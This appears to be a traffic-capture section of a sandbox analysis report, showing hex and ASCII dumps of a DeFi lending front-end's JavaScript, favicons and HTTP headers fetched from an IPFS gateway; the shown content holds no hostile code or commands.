                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 30 35 5d 2c 7b 35 36 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 6e 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 61 3d 72 28 32 39 36 33 30 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 73 3d 72 28 33 34 36 33 37 29 2c 6c 3d 72 28 35 39 33 37 39 29 2c 63 3d 72 28 34 36 39 33 30 29 2c 64 3d 72 28 37 38 33 37 31 29 2c 75 3d 72 28 34 35 37 34 35 29 2c 70 3d 72 28 31 35 34
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{56687:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return wn}});var n=r(49501),o=r(30120),a=r(29630),i=r(67294),s=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(154
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 73 74 61 62 6c 65 42 6f 72 72 6f 77 41 50 59 29 7d 29 29 2c 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 2d 74 5b 65 5d 7d 29 29 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 3f 22 70 6f 73 69 74 69 6f 6e 22 3d 3d 3d 74 3f 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 73 65 72 76 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3c 74 2e 72 65 73 65 72 76 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 2d 31 3a 31 7d 29 29 3a 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28
                                                                                                                                                                                                                                                  Data Ascii: stableBorrowAPY)})),r.sort((function(t,r){return r[e]-t[e]})))},z=function(e,t,r){return e?"position"===t?r.sort((function(e,t){return e.reserve.symbol.toUpperCase()<t.reserve.symbol.toUpperCase()?-1:1})):r.sort((function(e,t){return e.symbol.toUpperCase(
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 74 68 3a 37 30 2c 68 65 69 67 68 74 3a 32 30 7d 29 7d 29 2c 28 30 2c 47 2e 6a 73 78 73 29 28 71 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c 7b 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 37 34 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c 7b 68 65 69 67 68 74 3a 33 38 2c 77 69 64 74 68 3a 37 34 2c 73 78 3a 7b 6d 6c 3a 22 36 70 78 22 7d 7d 29 5d 7d 29 5d 7d 29 7d 2c 51 3d 72 28 39 32 33 39 31 29 2c 65 65 3d 72 28 31 35 38 38 30 29 2c 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73 29 28 65 65 2e 6f 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 51 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 58 2e 5a 2c
                                                                                                                                                                                                                                                  Data Ascii: th:70,height:20})}),(0,G.jsxs)(q,{children:[(0,G.jsx)(X.Z,{height:38,width:74}),(0,G.jsx)(X.Z,{height:38,width:74,sx:{ml:"6px"}})]})]})},Q=r(92391),ee=r(15880),te=function(){return(0,G.jsxs)(ee.o,{loading:!0,children:[(0,G.jsx)(Q.X,{caption:(0,G.jsx)(X.Z,
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 7b 76 61 72 20 74 3d 65 2e 61 76 61 69 6c 61 62 6c 65 56 61 6c 75 65 2c 72 3d 65 2e 69 73 55 53 44 2c 6f 3d 65 2e 63 61 70 54 79 70 65 2c 61 3d 72 3f 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 24 22 29 3a 74 2c 69 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 74 3e 30 3f 69 3d 6f 3d 3d 3d 4d 2e 52 2e 73 75 70 70 6c 79 43 61 70 3f 28 30 2c 47 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 61 73 73 65 74 20 68 61 73 20 61 6c 6d 6f 73 74 20 72 65 61 63 68 65 64 20 69 74 73 20 73 75 70 70 6c 79 20 63 61 70 2e 20 54 68 65 72 65 20 63 61 6e 20 6f 6e 6c 79 20 62 65 20 7b 6d 65 73 73 61 67 65 56 61 6c 75 65 7d 20 73 75 70 70 6c 69 65 64 20 74 6f 20 74 68 69 73 20 6d 61 72 6b 65 74 2e 22 2c 76 61 6c 75 65 73 3a 7b 6d 65 73 73 61 67 65 56 61 6c 75 65 3a
                                                                                                                                                                                                                                                  Data Ascii: {var t=e.availableValue,r=e.isUSD,o=e.capType,a=r?"".concat(t,"$"):t,i=void 0;return t>0?i=o===M.R.supplyCap?(0,G.jsx)(n.cC,{id:"This asset has almost reached its supply cap. There can only be {messageValue} supplied to this market.",values:{messageValue:
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 70 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 61 65 2e 42 2c 7b 76 61 6c 75 65 3a 75 3e 3d 30 3f 75 3a 30 2c 63 6f 6d 70 61 63 74 3a 21 30 2c 73 79 6d 62 6f 6c 3a 73 3f 22 55 53 44 22 3a 76 6f 69 64 20 30 2c 76 61 72 69 61 6e 74 3a 22 74 6f 6f 6c 74 69 70 22 7d 29 5d 7d 29 5d 7d 29 7d 2c 75 65 3d 72 28 35 32 39 30 36 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 6e 3d 65 2e 73 79 6d 62 6f 6c 2c 61 3d 65 2e 74 6f 6f 6c 74 69 70 2c 69 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73
                                                                                                                                                                                                                                                  Data Ascii: Z,{variant:"tooltip",color:"text.secondary",children:p}),(0,G.jsx)(ae.B,{value:u>=0?u:0,compact:!0,symbol:s?"USD":void 0,variant:"tooltip"})]})]})},ue=r(52906),pe=function(e){var t=e.value,r=e.incentives,n=e.symbol,a=e.tooltip,i=e.children;return(0,G.jsxs
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 73 2c 6c 3d 65 2e 63 75 72 72 65 6e 74 4d 61 72 6b 65 74 2c 63 3d 65 2e 66 72 6f 7a 65 6e 2c 75 3d 65 2e 70 61 75 73 65 64 2c 70 3d 65 2e 62 6f 72 72 6f 77 45 6e 61 62 6c 65 64 2c 78 3d 76 6f 69 64 20 30 3d 3d 3d 70 7c 7c 70 2c 62 3d 65 2e 73 68 6f 77 53 75 70 70 6c 79 43 61 70 54 6f 6f 6c 74 69 70 73 2c 68 3d 76 6f 69 64 20 30 21 3d 3d 62 26 26 62 2c 6d 3d 65 2e 73 68 6f 77 42 6f 72 72 6f 77 43 61 70 54 6f 6f 6c 74 69 70 73 2c 76 3d 76 6f 69 64 20 30 21 3d 3d 6d 26 26 6d 2c 79 3d 65 2e 73 68 6f 77 44 65 62 74 43 65 69 6c 69 6e 67 54 6f 6f 6c 74 69 70 73 2c 6a 3d 76 6f 69 64 20 30 21 3d 3d 79 26 26 79 2c 77 3d 28 30 2c 78 65 2e 5a 29 28 65 2c 4f 65 29 2c 43 3d 28 30 2c 54 2e 6f 76 29 28 29 2c 4f 3d 43 2e 73 75 70 70 6c 79 43 61 70 2c 6b 3d 43 2e 62 6f 72
                                                                                                                                                                                                                                                  Data Ascii: s,l=e.currentMarket,c=e.frozen,u=e.paused,p=e.borrowEnabled,x=void 0===p||p,b=e.showSupplyCapTooltips,h=void 0!==b&&b,m=e.showBorrowCapTooltips,v=void 0!==m&&m,y=e.showDebtCeilingTooltips,j=void 0!==y&&y,w=(0,xe.Z)(e,Oe),C=(0,T.ov)(),O=C.supplyCap,k=C.bor
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72
                                                                                                                                                                                                                                                  Data Ascii: bject.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function De(e){for(var t=1;t<arguments.length;t++){var r
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 6e 64 61 72 79 31 34 22 2c 73 78 3a 7b 6d 62 3a 22 32 70 78 22 7d 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6d 70 61 63 74 3a 21 31 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 61 65 2e 42 2c 7b 76 61 6c 75 65 3a 72 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 73 79 6d 62 6f 6c 3a 74 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6d 70 61 63 74 3a 21 31 7d 29 5d 7d 29 2c 61 72 72 6f 77 3a 21 30 2c 70 6c 61 63 65 6d 65 6e 74 3a 22 74 6f 70 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61
                                                                                                                                                                                                                                                  Data Ascii: ndary14",sx:{mb:"2px"},symbolsColor:"common.white",compact:!1}),(0,G.jsx)(ae.B,{value:r,variant:"secondary12",symbol:t,symbolsColor:"common.white",compact:!1})]}),arrow:!0,placement:"top",children:(0,G.jsx)(o.Z,{sx:{display:"flex",flexDirection:"column",a
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1369INData Raw: 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 74 61 72 67 65 74 3a 22 62 6c 61 6e 6b 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 45 6c 69 67 69 62 6c 65 20 66 6f 72 20 3c 30 3e 32 2e 31 4d 24 3c 2f 30 3e 20 77 45 54 48 20 43 6f 6d 6d 75 6e 69 74 79 20 50 72 6f 67 72 61 6d 20 5c 75 64 38 33 64 5c 75 64 63 37 62 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 47 2e 6a 73 78 29 28 22 73 74 72 6f 6e 67 22 2c 7b 7d 29 7d 7d 29 2c 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: extDecoration:"none",color:"inherit",textAlign:"center"},target:"blank",children:(0,G.jsxs)(a.Z,{variant:"secondary14",children:[(0,G.jsx)(n.cC,{id:"Eligible for <0>2.1M$</0> wETH Community Program \ud83d\udc7b",components:{0:(0,G.jsx)("strong",{})}}),(0,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  104192.168.2.549825209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC471OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1212INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:49 GMT
                                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                  Content-Length: 1150
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibdwnufrw7lp4njqwcjxwubq3nz5x3qcfhop65hz7lmzdh75dpvku"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/favicon.ico
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreibdwnufrw7lp4njqwcjxwubq3nz5x3qcfhop65hz7lmzdh75dpvku
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 72693
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e443486b8cc0-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC157INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 12 0b 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 c5 b7 33 ff c3 b3 36 ff c3 b0 3b ff c1 ad 3f ff c0 aa 44 ff be a6 47 ff be a3 4c ff bc 9f 50 ff bb 9d 55 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff b4 89 6e ff b2 85 72 ff c3 b3 36 ff c2 b0 3b ff cb b9 5d ff c6 b3 56 ff be a6 47 ff bd a3 4c ff bc 9f 50 ff bb 9c 54
                                                                                                                                                                                                                                                  Data Ascii: h( 36;?DGLPUX]afinr6;]VGLPT
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC993INData Raw: ff b9 99 58 ff b8 96 5d ff b7 92 61 ff b6 8f 65 ff b8 92 72 ff c2 9f 8b ff b2 85 72 ff b1 82 76 ff c3 b0 3b ff c1 ad 3f ff fb f9 f2 ff ef e9 d1 ff be a3 4c ff bc 9f 50 ff bb 9d 55 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff e0 cf c4 ff ff ff ff ff b7 8c 82 ff af 7e 7a ff c1 ac 3f ff c0 aa 43 ff e8 e0 be ff ff ff ff ff c5 ad 69 ff bb 9c 54 ff b9 99 58 ff b8 96 5d ff b7 92 61 ff b6 8f 65 ff b4 8b 69 ff b6 8d 74 ff fc fa f9 ff ef e5 e2 ff af 7e 7a ff ae 7b 7f ff c0 aa 44 ff be a6 47 ff cd b9 76 ff ff ff ff ff e1 d4 b5 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff b4 89 6e ff d1 b6 aa ff ff ff ff ff ce b0 ad ff af 7b 7f ff ad 78 83 ff be a6 47 ff bd a3 4c ff bc 9f 50 ff f6 f1 e7 ff fb f9 f5 ff b9 98 61 ff b7 92 61 ff b6 8f
                                                                                                                                                                                                                                                  Data Ascii: X]aerrv;?LPUX]afi~z?CiTX]aeit~z{DGvX]afin{xGLPaa


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  105192.168.2.549830209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:51 UTC473OUTGET /favicon32.ico HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:52 UTC1214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:52 GMT
                                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                  Content-Length: 1153
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifksq3guk7hdr3gekqbd77dh7czvetv7lgix3j3p4sx3h77kmtp4i"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/favicon32.ico
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreifksq3guk7hdr3gekqbd77dh7czvetv7lgix3j3p4sx3h77kmtp4i
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-06
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 72086
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e45248d8c32d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:52 UTC155INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed a3 00 00 04 48 49 44 41 54 78 01 34 cd 83 01 c3 40 00 00 c0 ac 58 db b6 6d db b6 dd e8 ff 07 6c a3 5b e0 b0 70 0d 44 2b 20 5e a2 52 45 2a 9d 27 73 39 32 9f 21 4a 69 a2 92 c0 6b 71 bc 11 fd b4 23 9f 4e e8 dd 0f be 07 be d7 d8 fb 9a ba 9f 73 d7 73 e9 b8 6f ec f7 ad f5 76 30 df 8e c6 eb c5 70 bd e9 2e 0f ed e5 a5 3e 7d 95 27 5c 7e a4 64 47 5a 72 40 e2 03 16 6c c0 ff 11
                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR HIDATx4@Xml[pD+ ^RE*'s92!Jikq#Nssov0p.>}'\~dGZr@l
                                                                                                                                                                                                                                                  2024-09-28 04:11:52 UTC998INData Raw: ab 82 78 99 4e 15 69 ee 28 70 47 12 af 33 c7 b7 1d f9 72 c7 d0 ff 1a fb 98 63 c1 1c 8f 8d fd c1 1c 96 db 49 38 9e cc 71 fe aa ce b8 82 39 80 e4 80 f9 9a 90 3b 7e 95 95 03 97 2b 4f 10 c5 fb 23 fd 6d db b6 6d db b6 b9 b6 bd 13 7b 6d db de d8 76 26 af df f6 a4 32 51 67 5e 9f 1c 8c fa f6 2f 75 6f 15 9d a3 e6 57 95 db e1 4f 9e ac 95 d1 dd 92 d7 da 05 72 a0 d7 7e 91 be 81 35 a8 1c bf 7e ca f8 bd a1 24 6f 4d 29 57 05 72 a0 97 7f 95 62 0d 3a 87 b4 7b 2e 99 b9 22 a1 e8 ff 6f 75 0a a9 07 7a e9 0f f9 cb bf 49 e9 1c 56 b3 87 ec eb f3 a4 39 34 ad 53 42 ea 81 9e ff 53 f6 d2 ef 32 0a 47 59 d9 00 6c 2a eb 9c b5 9a 38 31 bb c9 23 c4 57 e8 b9 bf 15 cf ff 29 a7 70 cc cc 1d 90 1d a3 91 f8 4f 9f 33 ca de 79 d0 6b f9 43 5b d4 57 e8 e9 7f 14 cf 62 8d 02 1c 9f ff 28 8d c5 13 64
                                                                                                                                                                                                                                                  Data Ascii: xNi(pG3rcI8q9;~+O#mm{mv&2Qg^/uoWOr~5~$oM)Wrb:{."ouzIV94SBS2GYl*81#W)pO3ykC[Wb(d


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  106192.168.2.549832209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:52 UTC770OUTGET /governance/ HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:53 UTC1101INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:53 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/governance/
